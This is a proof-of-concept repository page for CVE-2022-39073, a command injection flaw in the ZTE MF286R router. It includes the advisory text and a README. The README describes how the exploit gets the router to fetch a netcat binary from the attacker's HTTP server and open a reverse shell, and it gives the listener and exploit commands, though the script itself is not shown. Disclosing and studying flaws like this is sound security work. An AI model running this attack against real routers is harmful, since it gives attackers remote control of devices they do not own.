
CVE-2022-39073 PoC — ZTE MF286R Command Injection Vulnerability

Associated Vulnerability
Title: ZTE MF286R Command Injection Vulnerability (CVE-2022-39073)
Description: There is a command injection vulnerability in the ZTE MF286R. Due to insufficient validation of input parameters, an attacker could use the vulnerability to execute arbitrary commands.
Description
Proof of concept for the command injection vulnerability affecting the ZTE MF286R router, including an RCE exploit.
Readme
# CVE-2022-39073

Firmware details:

```
wa_inner_version: BD_POSTEMF286RMODULEV1.0.0B12
cr_version: CR_ITPOSTEMF286RV1.0.0B10
```

## Prerequisites

- requests (`pip install requests`)

## Command Injection

The vulnerability is a command injection shared between the `zte_net_link_detect` binary and the `WATCH_DOG_SWITCH` handler in the `goahead` webserver binary.

Note that the vulnerability can only be exploited when the router is connected to the WAN or connected to the Internet via a SIM card (the `ppp_status` key must have the value `ppp_connected`, `ipv4_ipv6_connected` or `ipv6_connected`).

### Risks

- Remote code execution (RCE)
- Arbitrary command execution

### Proof of Concept

The idea of the exploit is to download a static netcat binary from an HTTP server and then open a reverse shell with it.
P.S.: the netcat included in this folder is big-endian.

- Open an HTTP server in this directory: `python3 -m http.server 8080`
- Open a listening socket on port `9999` with `nc -lvp 9999`
- Run the script in this folder: `python3 exploit.py http://<router> <admin_password> <attacker_ip, e.g. 192.168.1.101>`

## References

This vulnerability was reported by Andrea Maugeri in September 2022.
https://support.zte.com.cn/support/news/NewsDetail.aspx?newsId=1028664
File Snapshot

```
[4.0K] /data/pocs/bfafa845d1a862f1bb82b28750b945fd30762285
├── [2.0K] exploit.py
├── [174K] netcat
└── [1.3K] README.md

0 directories, 3 files
```